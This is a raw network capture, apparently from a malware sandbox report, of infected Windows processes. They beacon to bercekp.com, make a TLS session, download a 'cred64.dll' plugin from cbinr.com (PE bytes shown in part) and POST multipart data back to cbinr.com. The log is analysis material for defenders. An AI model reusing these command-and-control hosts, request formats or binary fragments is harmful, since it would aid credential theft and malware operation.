                                                                                                                                                                    115192.168.2.349892185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:01.441128016 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:01.677763939 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:01 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    116192.168.2.349893185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:02.072060108 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:02.308554888 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:02 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    117192.168.2.349894185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:02.759828091 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:02.996889114 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:02 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    118192.168.2.349895185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:03.365263939 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:03.601669073 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:03 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    119192.168.2.349884194.126.174.190807556C:\Users\user\AppData\Local\Temp\5A89.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:03.926623106 CET203OUTData Raw: 16 03 01 00 c6 01 00 00 c2 03 03 34 83 a3 2a 76 da 57 13 e6 33 cc 03 f7 75 4c 25 cb b6 8c e2 dc 63 ec 20 13 c7 c4 27 83 57 a5 a4 00 00 1c c0 2b c0 2f c0 2c c0 30 c0 0a c0 09 c0 13 c0 14 00 33 00 39 00 2f 00 35 00 0a 00 ff 01 00 00 7d 00 00 00 24
                                                                                                                                                                    Data Ascii: 4*vW3uL%c 'W+/,039/5}$"www.wi6lfwtlavxsabit7p7b3wo.com#
                                                                                                                                                                    Feb 8, 2024 19:11:04.128659964 CET1009INData Raw: 16 03 03 00 39 02 00 00 35 03 03 cb 86 53 6b 91 a6 4c e5 f9 58 70 f6 ab 2d b8 9d 3a 5f bf ff 71 f2 a5 79 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 0d ff 01 00 01 00 00 0b 00 04 03 00 01 02 16 03 03 02 53 0b 00 02 4f 00 02 4c 00 02 49 30 82 02 45 30
                                                                                                                                                                    Data Ascii: 95SkLXp-:_qyDOWNGRD0SOLI0E00*H0 10Uwww.bj2lvo5fhkslw.com0231217000000Z240303000000Z0%1#0!Uwww.pxkdsr7jwdvwfypj2s.net0"0*H
                                                                                                                                                                    Feb 8, 2024 19:11:04.352632046 CET126OUTData Raw: 16 03 03 00 46 10 00 00 42 41 04 14 3b 83 d5 a0 35 5c 39 a8 d5 b8 e8 f5 13 e4 a5 91 9d 0d 21 37 7b 5f 27 80 96 6d 10 bb 46 17 9d a3 10 8e a7 2c 1f 10 bb 8e 8b ec d1 fd 71 2a 98 90 44 8b 77 20 78 fd d1 0f 1c d7 bb 96 b8 77 6d 14 03 03 00 01 01 16
                                                                                                                                                                    Data Ascii: FBA;5\9!7{_'mF,q*Dw xwm(lH'u.@08sYY
                                                                                                                                                                    Feb 8, 2024 19:11:04.554320097 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 64 62 ae 27 30 c5 7e a4 42 5e 45 76 90 bc 24 11 ef f7 f8 5b af 76 64 90 ed 06 4e 6b db 38 fb 8f d7 46 40 a4 07 57 fd 61
                                                                                                                                                                    Data Ascii: (db'0~B^Ev$[vdNk8F@Wa
                                                                                                                                                                    Feb 8, 2024 19:11:04.783288956 CET40OUTData Raw: 17 03 03 00 23 e5 01 a8 09 6c af 48 ae f3 e5 9a df 68 34 b2 4f 13 cc d1 16 ce 44 04 68 5f ef 36 cd d2 6f 24 16 18 22 dd
                                                                                                                                                                    Data Ascii: #lHh4ODh_6o$"
                                                                                                                                                                    Feb 8, 2024 19:11:04.987235069 CET1286INData Raw: 17 03 03 08 0a 64 62 ae 27 30 c5 7e a5 5c 06 57 a0 15 aa 74 83 38 35 4c 48 ce 31 cb 44 d9 d9 5c f8 e7 35 70 ca 8b 44 e1 40 a7 c7 06 b3 81 dd 95 39 dc ab 1c 08 4f 1e a3 14 7b dd c3 37 16 46 b3 ab cd 37 84 9f 8d 47 62 7d 6a a6 c1 04 c6 d8 b2 30 7c
                                                                                                                                                                    Data Ascii: db'0~\Wt85LH1D\5pD@9O{7F7Gb}j0|r<T}53I'vhQnSOIs]h0?e_Gf/v@1WI5scDceTT=qqG:vlQ\]'&B6{:k6<JSZf^
                                                                                                                                                                    Feb 8, 2024 19:11:04.987293959 CET777INData Raw: c7 30 d7 5e f4 22 45 71 4a f9 fc ca d3 32 13 11 ce 2a 71 8a 39 f3 d9 f4 3b 50 96 55 94 71 e6 cb 06 d8 37 89 68 5f 78 57 e5 f6 d8 92 1e bf 5f 11 5e 89 2a 7c 55 a5 26 6b cf 95 5d 09 0a f3 ac 17 25 31 00 88 86 05 85 93 8e 02 d4 07 4e cc 8a e7 91 69
                                                                                                                                                                    Data Ascii: 0^"EqJ2*q9;PUq7h_xW_^*|U&k]%1NiE/s=?[81;C<fjh?W=<}ls(Li&g%Q(78,p39Rp97qS)4bQ8IK4.,('NoP$~)O|]GD7
                                                                                                                                                                    Feb 8, 2024 19:11:04.989507914 CET543OUTData Raw: 17 03 03 02 1a e5 01 a8 09 6c af 48 af 03 af 9a 5b e9 1c 17 fa 44 20 ad 10 03 3d 21 a9 ec a9 5a dd e4 29 81 57 3f dd 09 27 92 f4 e4 a5 c2 6d 0f 4f 18 2d 76 e9 40 95 d4 0f 8d ec e7 e9 ad 5a 6a 9e 71 af 4e 92 46 75 09 b4 85 38 a4 ea 6f 45 1f ba 3b
                                                                                                                                                                    Data Ascii: lH[D =!Z)W?'mO-v@ZjqNFu8oE;LcnrX%GD~sfSf|s>SZ"jz.*ik\6~,)4 V~ZGKvZlbA2)]BzKl[JB>H:u$|;1c
                                                                                                                                                                    Feb 8, 2024 19:11:05.232059956 CET543OUTData Raw: 17 03 03 02 1a e5 01 a8 09 6c af 48 b0 e6 5c b0 cd 0a ad 9f 23 f1 7c 71 cb 80 b0 30 f8 59 0e 74 6e 86 55 d9 07 91 03 89 07 4e e3 f1 33 2b 6f aa 4e 05 88 88 5c f2 51 d2 42 d7 61 9b c7 d2 8f 88 fe ed a1 59 f2 f2 f0 f1 f3 a9 1a 90 2b c6 3f 1a 41 9f
                                                                                                                                                                    Data Ascii: lH\#|q0YtnUN3+oN\QBaY+?Ans2{x_tenU0$aRQyc/]LSb+(-&6B,?D[^:=p*'UWM~xdK{GtkBA< yGV,Cm>Iz8X!
                                                                                                                                                                    Feb 8, 2024 19:11:05.584155083 CET543INData Raw: 17 03 03 02 1a 64 62 ae 27 30 c5 7e a6 f4 c3 fc 44 90 12 6b e6 88 63 e3 37 67 33 27 7a 27 8c cd e0 f4 64 8f cc b0 6f 1f 45 a7 4e e3 ac 91 45 b8 88 c4 ce 50 d1 8c d0 5d 0f be 65 1a d0 6f 5b 92 7c 1c 72 fa 5b 7f 19 d3 b0 58 43 85 a1 f9 ea c3 ad fd
                                                                                                                                                                    Data Ascii: db'0~Dkc7g3'z'doENEP]eo[|r[XC_jx4^Yz[;dS_|nBy6Zb9efB\"zgtvMOhm\bwBBs!%?T[$cP7u-,tzt~Nd=l<K(u


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    120192.168.2.349896185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:03.955893993 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:04.192905903 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:04 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    121192.168.2.349897185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:05.025228977 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:05.262079954 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:05 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                    122192.168.2.349898109.175.29.3980
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:05.739757061 CET59OUTGET /forum/Plugins/cred64.dll HTTP/1.1
                                                                                                                                                                    Host: cbinr.com
                                                                                                                                                                    Feb 8, 2024 19:11:06.201313019 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:05 GMT
                                                                                                                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                    Last-Modified: Thu, 12 Oct 2023 08:02:10 GMT
                                                                                                                                                                    ETag: "11ec00-607805b588480"
                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                    Content-Length: 1174528
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 91 b6 1a 1c d5 d7 74 4f d5 d7 74 4f d5 d7 74 4f 8e bf 70 4e c7 d7 74 4f 8e bf 77 4e de d7 74 4f 8e bf 71 4e 65 d7 74 4f 00 ba 71 4e 90 d7 74 4f 00 ba 70 4e da d7 74 4f 00 ba 77 4e dc d7 74 4f 8e bf 75 4e d8 d7 74 4f d5 d7 75 4f 15 d7 74 4f 4e b9 7d 4e d1 d7 74 4f 4e b9 74 4e d4 d7 74 4f 4e b9 8b 4f d4 d7 74 4f 4e b9 76 4e d4 d7 74 4f 52 69 63 68 d5 d7 74 4f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 03 a8 27 65 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 18 00 42 0e 00 00 e8 03 00 00 00 00 00 78 d8 0b 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 12 00 00 04 00 00 00 00 00 00 02 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 10 f5 10 00 58 00 00 00 68 f5 10 00 8c 00 00 00 00 50 12 00 f8 00 00 00 00 90 11 00 fc a2 00 00 00 00 00 00 00 00 00 00 00 60 12 00 10 15 00 00 60 1d 10 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 1d 10 00 08 01 00 00 00 00 00 00 00 00 00 00 00 60 0e 00 e8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 40 0e 00 00 10 00 00 00 42 0e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d2 a9 02 00 00 60 0e 00 00 aa 02 00 00 46 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 8c 7f 00 00 00 10 11 00 00 3e 00 00 00 f0 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 fc a2 00 00 00 90 11 00 00 a4 00 00 00 2e 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 5f 52 44 41 54 41 00 00 94 00 00 00 00 40 12 00 00 02 00 00 00 d2 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 f8 00 00 00 00 50 12 00 00 02 00 00 00 d4 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 15 00 00 00 60 12 00 00 16 00 00 00 d6 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$tOtOtOpNtOwNtOqNetOqNtOpNtOwNtOuNtOuOtON}NtONtNtONOtONvNtORichtOPEd'e" Bx`XhP``p`.text@B `.rdata`F@@.data>@.pdata.@@_RDATA@@@.rsrcP@@.reloc`@B
                                                                                                                                                                    Feb 8, 2024 19:11:06.201441050 CET1286INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 83 ec 28 41 b8 20 00 00 00 48 8d 15 17 f7 0f 00 48 8d 0d 00 2b 11 00 e8 73 3f 0b
                                                                                                                                                                    Data Ascii: H(A HH+s?H,H(H(A HH/C?HlH(H(AHH@0?HH(H(A HHP+>HH(O
                                                                                                                                                                    Feb 8, 2024 19:11:06.201862097 CET1286INData Raw: 6c 20 0e 00 48 83 c4 28 e9 2f c0 0b 00 cc cc cc 48 83 ec 28 41 b8 0c 00 00 00 48 8d 15 ef f4 0f 00 48 8d 0d 80 25 11 00 e8 93 3a 0b 00 48 8d 0d ac 20 0e 00 48 83 c4 28 e9 ff bf 0b 00 cc cc cc 48 83 ec 28 41 b8 0c 00 00 00 48 8d 15 cf f4 0f 00 48
                                                                                                                                                                    Data Ascii: l H(/H(AHH%:H H(H(AHH*c:H H(H(A(HH@)3:H,!H(H(AHH+:Hl!H(oH(AHH-9H!
                                                                                                                                                                    Feb 8, 2024 19:11:06.202070951 CET1286INData Raw: 11 00 e8 b3 35 0b 00 48 8d 0d 2c 27 0e 00 48 83 c4 28 e9 1f bb 0b 00 cc cc cc 48 83 ec 28 41 b8 0c 00 00 00 48 8d 15 47 f2 0f 00 48 8d 0d d0 24 11 00 e8 83 35 0b 00 48 8d 0d 6c 27 0e 00 48 83 c4 28 e9 ef ba 0b 00 cc cc cc 48 83 ec 28 41 b8 04 00
                                                                                                                                                                    Data Ascii: 5H,'H(H(AHGH$5Hl'H(H(AH'H"S5H'H(H(AHH(#5H'H(H(AHH#4H,(H(_H(AHHP"
                                                                                                                                                                    Feb 8, 2024 19:11:06.435440063 CET1286INData Raw: e0 dc 0f 00 75 0c 49 ff c0 49 ff c1 85 c0 7f d5 ff c8 85 c0 78 1e 41 0f b6 01 42 0f b6 8c 30 e0 dc 0f 00 41 0f b6 00 42 0f b6 84 30 e0 dc 0f 00 2b c1 75 0f 0f b6 04 2e 42 f6 84 30 a0 d1 0f 00 46 74 22 41 ff c3 48 83 c3 08 41 83 fb 02 7c 84 33 c0
                                                                                                                                                                    Data Ascii: uIIxAB0AB0+u.B0Ft"AHA|3H\$ Hl$(Ht$0A^_H\$ Hl$(Ht$0A^_wHcHH3H(w+HcLHAIAD(AEtJ(3H(LA8H`n
                                                                                                                                                                    Feb 8, 2024 19:11:06.435957909 CET1286INData Raw: 43 20 4a 8b 44 00 08 48 85 c0 74 1c 48 8b 40 08 48 8b 08 44 03 8c b9 d4 00 00 00 45 85 db 74 08 44 89 b4 b9 d4 00 00 00 ff c2 49 83 c0 20 3b 53 28 7c cb 44 89 75 00 45 89 0f eb 29 44 89 75 00 4c 39 b3 18 03 00 00 7f 0c 41 8b c6 4c 39 b3 10 03 00
                                                                                                                                                                    Data Ascii: C JDHtH@HDEtDI ;S(|DuE)DuL9AL9~AAHKL|$ H|$8Ht$@Hl$HH\$`HtIAHPA^C !.#t t t ###$HL$HT$LD$LL$ SUVWAVHH\$8E3
                                                                                                                                                                    Feb 8, 2024 19:11:06.436306000 CET1286INData Raw: c8 48 2b d1 49 89 13 48 83 c4 08 c3 cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 10 48 89 74 24 18 57 48 83 ec 20 48 8b 71 18 48 8b fa 48 8b 86 c0 00 00 00 48 85 c0 75 67 48 8b 01 48 8b 48 28 48 8b 01 83 38 02 7c 24 4c 8b 80 88 00 00 00 4d 85
                                                                                                                                                                    Data Ascii: H+IHH\$Ht$WH HqHHHugHHH(H8|$LMtHHAH'HT$0HPxD$0Y0H,Ht3HHH~G*3H\$8Ht$@H _H\$8Ht$@H _LI[UVWAVAWH*IC
                                                                                                                                                                    Feb 8, 2024 19:11:06.436474085 CET1286INData Raw: cc cc 48 89 5c 24 10 48 89 74 24 18 55 48 8d 6c 24 a9 48 81 ec c0 00 00 00 0f 10 49 10 33 c0 49 8b f0 0f 57 c0 89 45 17 0f 11 45 f7 48 8b da 0f 11 45 07 0f 10 01 0f 11 4d d7 0f 11 45 c7 0f 10 41 20 48 8d 4d c7 0f 11 45 e7 e8 c3 fd ff ff 48 8d 4d
                                                                                                                                                                    Data Ascii: H\$Ht$UHl$HI3IWEEHEMEA HMEHMEMBwEX,fnfoEEWHMEEEHS HmH\HHHH?H=HMgudHUgHM!
                                                                                                                                                                    Feb 8, 2024 19:11:06.436805964 CET1286INData Raw: 44 8b fb e9 f5 03 00 00 48 8b cb 4c 8d 45 b9 48 8d 15 4a 35 0f 00 66 0f 1f 44 00 00 41 0f b6 04 08 48 ff c1 3a 44 0a ff 0f 85 cf 03 00 00 48 83 f9 04 75 e8 44 8b fb e9 c1 03 00 00 48 8b 4d b1 41 8b f7 84 c9 74 27 48 8d 55 b1 90 80 f9 3a 74 1d 0f
                                                                                                                                                                    Data Ascii: DHLEHJ5fDAH:DHuDHMAt'HU:tF0uBHuEHU8DHMMsHcHuH>:EHMWHUEB0HEEHDE'HMHuH3ukcHl
                                                                                                                                                                    Feb 8, 2024 19:11:06.437639952 CET1286INData Raw: 74 3c 0f b7 c2 66 41 23 c7 66 41 3b c7 75 0c 80 79 0a 01 75 06 48 8b 41 10 eb 0c f6 c2 01 75 1e b2 01 e8 af 19 02 00 48 85 c0 74 12 4c 8b c6 48 8b d0 48 8b cd e8 8c f1 ff ff 85 c0 74 68 b8 01 00 00 00 e9 d1 00 00 00 f6 c2 08 74 06 f2 0f 10 01 eb
                                                                                                                                                                    Data Ascii: t<fA#fA;uyuHAuHtLHHtht7tWH*(t#DIHT$ DAHID$ HD$ YF*XH,HHH~hfIH{QfA#fA;uyuHAUH
                                                                                                                                                                    Feb 8, 2024 19:11:06.437794924 CET1286INData Raw: eb 04 49 83 c0 32 0f b6 42 01 48 ff c2 49 ff c0 84 c0 75 ae 49 83 f8 64 72 5b 49 63 41 68 4c 3b c0 0f 87 cb 04 00 00 49 63 d0 49 8b c9 e8 be 15 00 00 4c 8b f0 48 85 c0 75 3f 49 8b 04 24 b9 60 24 00 00 66 85 48 08 74 0a 48 8b c8 e8 df 08 02 00 eb
                                                                                                                                                                    Data Ascii: I2BHIuIdr[IcAhL;IcILHu?I$`$fHtHfXI$AD$$A\$)HH(YPLuHL$0-HL$0sHL$03L$pH3ukcLl$0I%I$I$I)$ IS |$PI\LD)$D


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                    123192.168.2.349899109.175.29.3980
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:05.812216043 CET148OUTPOST /forum/index.php HTTP/1.1
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Host: cbinr.com
                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                    Feb 8, 2024 19:11:06.162237883 CET239INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:06 GMT
                                                                                                                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                    X-Powered-By: PHP/7.4.15
                                                                                                                                                                    Content-Length: 1
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Data Raw: 33
                                                                                                                                                                    Data Ascii: 3


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    124192.168.2.349900185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:05.886723042 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:06.123096943 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:06 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                    125192.168.2.349901109.175.29.3980
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:06.414314032 CET164OUTPOST /forum/index.php?scr=1 HTTP/1.1
                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----MTA1NzA3
                                                                                                                                                                    Host: cbinr.com
                                                                                                                                                                    Content-Length: 105859
                                                                                                                                                                    Cache-Control: no-cache
